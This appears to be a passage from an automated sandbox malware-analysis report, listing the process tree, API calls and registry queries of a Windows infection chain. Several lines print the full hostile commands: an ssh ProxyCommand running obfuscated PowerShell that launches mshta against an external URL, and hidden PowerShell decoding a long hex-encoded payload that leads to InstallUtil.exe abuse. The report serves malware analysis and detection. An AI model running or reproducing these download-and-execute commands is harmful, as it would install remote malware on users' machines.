                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01346B12 mov eax, dword ptr fs:[00000030h]11_2_01346B12
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01346B19 mov eax, dword ptr fs:[00000030h]11_2_01346B19
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01346B19 mov eax, dword ptr fs:[00000030h]11_2_01346B19
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01340C2D mov eax, dword ptr fs:[00000030h]11_2_01340C2D
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01352A86 mov eax, dword ptr fs:[00000030h]11_2_01352A86
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_017772F6 mov eax, dword ptr fs:[00000030h]14_2_017772F6
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176B382 mov eax, dword ptr fs:[00000030h]14_2_0176B382
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176B382 mov eax, dword ptr fs:[00000030h]14_2_0176B382
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176B389 mov eax, dword ptr fs:[00000030h]14_2_0176B389
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176B389 mov eax, dword ptr fs:[00000030h]14_2_0176B389
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176549D mov eax, dword ptr fs:[00000030h]14_2_0176549D
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_004B88CD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048A354 SetUnhandledExceptionFilter,11_2_0048A354
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0048A385
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009AA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_009AA385
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009AA354 SetUnhandledExceptionFilter,14_2_009AA354
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeMemory protected: page read and write | page write copy | page execute | page execute read | page execute and write copy | page guard | page no cacheJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004B9369 LogonUserW,11_2_004B9369
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00475240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00475240
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C1AC6 SendInput,keybd_event,11_2_004C1AC6
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C51E2 mouse_event,11_2_004C51E2
                    Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\47891652\updater.exe "C:\Users\user\AppData\Local\Temp\47891652\updater.exe" C:\Users\user\AppData\Local\Temp\47891652\bovZdOEN.bin Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" .
                    Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function xmcki($txxjw){return -split ($txxjw -replace '..', '0x$& ')};$lwtkb = xmcki('a91aeef14d627b7faff488dbccfe43edd74c8ec41df4afdae86a2cacd63d2618e776ab95b16be51714d0c93388447c10995b802510da96a4bf1b9a934093f8ea670fe6b480a54ab53be4b52fc1abdd0b2f9a47d5fd8ec0b5565cf6e0d5aaa18330404f1bab02271e1f4adb91da26835fbd6f294448368ae11c958f79f412c62c2b5b5ed8bc591ce31107db0b96407294783a633b181b6ccfc9827e4078d2d612aecf34e25c3732da701d97a8d605ea1a7c739adf164e68bd11e6acec79c72bedba160c18420a5db1d9810bd0b1fe135f640f78fec268a192784340b9c69305f19e92cf4f0ef596571f8839c8acf651d0ba0ee2d7ec50e13be537e55036bc27049b63d09ca27c81001319e386cf456f2175699371cad7a1a9f6165c7c5452bca976318223f68e182ddfa4a6a6e0d3a37b3ff3d396a65b4465c3cc0736702e834f0baaae20f6b4e273e97bd27bf14dab30e834ec586fa7feb119497e06f166f11571bd5761f27fc24fd517f4f7b7d12d7114efc8db1e29aa9687ac4bc2a6b4bdd893e35941dac5f77f86582f2f16a448f88f4807cb645fdc4426ff6a2a211758433846d104900f052f81898303fb3e54b3f463b628b3140a4bbd84f9e5b31e891ed77433a9b65bd1c0fea1c06740e0bc212bc132161654e200851a5da2bb192042e792908ea1f9c6eb7eee004e8e047c0a08e66e6d9b8e7bcb944609f5b020cc1479272b40a2d304ac191e6c492064720abe984d0f4cf077c873c863d03924997c8e4e627c7811bf2ebd9b06da61c1c0b04e7ea2f2cabb41143da53e8f7300f859ae1cfdf9875e0dfeebd0ff7229b35b1646f5b57816308ad9d62c6ca75d45bd15c1a2b4da51922caa8e46ac5b09df7821207379a305101f22ea2f6bb40dba589322a506d5ad46da486cf86f662522d165f38590072f1accf13a612369b433b00e300cfd06068817a53c68187347c9ad251d6f1f333877bad8577c4ab84ba78f81483cbcb6bdb1e8fe6a5233fdfff6cc9928404b2e11cfc58e38822138c47f68d6a48778e95f28d8f25c5f1a20d5a198b64b2f05536c7ea824ff816bf184fea692844badf041a46dc4e6a197bda3855b32c46f4b393d58d5d4c7bfbcf82beb6990bb2069da637871dbfb368f1c0e6c0f2a72676ccf3b7fa358c5e09f7e9a8f481775a2d9117cf07d2ed2895d11a6b79e3ce80bd9091e7cc6fcfc76786b1a9a48950c7262c0e9607a4c88c23f16b1cd72267a4445314586554ed8498e02e1556e66e550678d68d2a7dbdbc94565dfee58566dce466d06c87acd0517e92543d88380a92238e86864e5f75c12798c8828272b20a02c40b6b317f309f4d0c660c1d640def366d59f6e605ca9cea69b14214c5d03df39fc5d74b79c43d775d114603d2c9be7f3d35d5f2c62881528c7674e5f58b568c6356fc1470bd70b46364f0545eff33ffc0f3a9487f46e68a23603bcf5a004a1e550eb57c6e96b9828cb4973dbfcb8d62afd7390e01d13cc7760093f91b2f0c22d85e18d540e5cbff1d1a2466bdd39b1846617923d9c4b65a96df2e6fca65713714d212f0f1e8a005b0154fbd7266ba5500e44b40ddfc0174ec740d8ce82ec79b28e9071c42d33693277f784c16744c61bab31bef511d797c50afce5b6f0157f4b0b8f8201dbcafa5813f3156ecfb13519109ff3673aefc6e65c7966d8afa03a8d9d665bf954962cc128461d04e92bbc3e9acd8ca2b7120bf07f55a8ee5e4b6f185e1266c8eddd2ee3761605723cf877a93883b9f459f8231af5ff827049dd16cbcfa02de3abb97da37d487474f6d66efaf3d7d75cf686bd09c2d72bbea469800332fe98aa37baac82515b23041cb7d36849f05ac76ed6cf4e5deeab16e7ffa53e4b56f7ecc66091d6b1dfaf76d3c264e80e69b82674685bf8a742080384ca722b401e88f71676753c5f86d718994e638562e8b5a9b07
                    Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function xmcki($txxjw){return -split ($txxjw -replace '..', '0x$& ')};$lwtkb = xmcki('a91aeef14d627b7faff488dbccfe43edd74c8ec41df4afdae86a2cacd63d2618e776ab95b16be51714d0c93388447c10995b802510da96a4bf1b9a934093f8ea670fe6b480a54ab53be4b52fc1abdd0b2f9a47d5fd8ec0b5565cf6e0d5aaa18330404f1bab02271e1f4adb91da26835fbd6f294448368ae11c958f79f412c62c2b5b5ed8bc591ce31107db0b96407294783a633b181b6ccfc9827e4078d2d612aecf34e25c3732da701d97a8d605ea1a7c739adf164e68bd11e6acec79c72bedba160c18420a5db1d9810bd0b1fe135f640f78fec268a192784340b9c69305f19e92cf4f0ef596571f8839c8acf651d0ba0ee2d7ec50e13be537e55036bc27049b63d09ca27c81001319e386cf456f2175699371cad7a1a9f6165c7c5452bca976318223f68e182ddfa4a6a6e0d3a37b3ff3d396a65b4465c3cc0736702e834f0baaae20f6b4e273e97bd27bf14dab30e834ec586fa7feb119497e06f166f11571bd5761f27fc24fd517f4f7b7d12d7114efc8db1e29aa9687ac4bc2a6b4bdd893e35941dac5f77f86582f2f16a448f88f4807cb645fdc4426ff6a2a211758433846d104900f052f81898303fb3e54b3f463b628b3140a4bbd84f9e5b31e891ed77433a9b65bd1c0fea1c06740e0bc212bc132161654e200851a5da2bb192042e792908ea1f9c6eb7eee004e8e047c0a08e66e6d9b8e7bcb944609f5b020cc1479272b40a2d304ac191e6c492064720abe984d0f4cf077c873c863d03924997c8e4e627c7811bf2ebd9b06da61c1c0b04e7ea2f2cabb41143da53e8f7300f859ae1cfdf9875e0dfeebd0ff7229b35b1646f5b57816308ad9d62c6ca75d45bd15c1a2b4da51922caa8e46ac5b09df7821207379a305101f22ea2f6bb40dba589322a506d5ad46da486cf86f662522d165f38590072f1accf13a612369b433b00e300cfd06068817a53c68187347c9ad251d6f1f333877bad8577c4ab84ba78f81483cbcb6bdb1e8fe6a5233fdfff6cc9928404b2e11cfc58e38822138c47f68d6a48778e95f28d8f25c5f1a20d5a198b64b2f05536c7ea824ff816bf184fea692844badf041a46dc4e6a197bda3855b32c46f4b393d58d5d4c7bfbcf82beb6990bb2069da637871dbfb368f1c0e6c0f2a72676ccf3b7fa358c5e09f7e9a8f481775a2d9117cf07d2ed2895d11a6b79e3ce80bd9091e7cc6fcfc76786b1a9a48950c7262c0e9607a4c88c23f16b1cd72267a4445314586554ed8498e02e1556e66e550678d68d2a7dbdbc94565dfee58566dce466d06c87acd0517e92543d88380a92238e86864e5f75c12798c8828272b20a02c40b6b317f309f4d0c660c1d640def366d59f6e605ca9cea69b14214c5d03df39fc5d74b79c43d775d114603d2c9be7f3d35d5f2c62881528c7674e5f58b568c6356fc1470bd70b46364f0545eff33ffc0f3a9487f46e68a23603bcf5a004a1e550eb57c6e96b9828cb4973dbfcb8d62afd7390e01d13cc7760093f91b2f0c22d85e18d540e5cbff1d1a2466bdd39b1846617923d9c4b65a96df2e6fca65713714d212f0f1e8a005b0154fbd7266ba5500e44b40ddfc0174ec740d8ce82ec79b28e9071c42d33693277f784c16744c61bab31bef511d797c50afce5b6f0157f4b0b8f8201dbcafa5813f3156ecfb13519109ff3673aefc6e65c7966d8afa03a8d9d665bf954962cc128461d04e92bbc3e9acd8ca2b7120bf07f55a8ee5e4b6f185e1266c8eddd2ee3761605723cf877a93883b9f459f8231af5ff827049dd16cbcfa02de3abb97da37d487474f6d66efaf3d7d75cf686bd09c2d72bbea469800332fe98aa37baac82515b23041cb7d36849f05ac76ed6cf4e5deeab16e7ffa53e4b56f7ecc66091d6b1dfaf76d3c264e80e69b82674685bf8a742080384ca722b401e88f71676753c5f86d718994e638562e8b5a9b07Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_004B88CD
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_004C4F1C
                    Source: updater.exe, 0000000B.00000003.2229606541.0000000004B4D000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.000000000497A000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000000.2223684167.0000000000516000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: updater.exe, AutoIt3.exeBinary or memory string: Shell_TrayWnd
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerteaq
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q/explorer.exe &*&*& Program Manager &*&*& [WIN]rt-]q
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048885B cpuid 11_2_0048885B
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_0132FB45
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: GetLocaleInfoA,GetACP,11_2_01336061
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: GetLocaleInfoA,11_2_01330469
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: GetLocaleInfoA,11_2_01334B15
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: GetLocaleInfoA,11_2_01334AC9
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_0132FC4F
                    Source: C:\ahdccea\AutoIt3.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_017543B5
                    Source: C:\ahdccea\AutoIt3.exeCode function: GetLocaleInfoA,14_2_01759339
                    Source: C:\ahdccea\AutoIt3.exeCode function: GetLocaleInfoA,14_2_01759385
                    Source: C:\ahdccea\AutoIt3.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_017544BF
                    Source: C:\ahdccea\AutoIt3.exeCode function: GetLocaleInfoA,GetACP,14_2_0175A8D1
                    Source: C:\ahdccea\AutoIt3.exeCode function: GetLocaleInfoA,14_2_01754CD9
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\ahdccea\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\ahdccea\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\ahdccea\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\ahdccea\AutoIt3.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\ahdccea\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
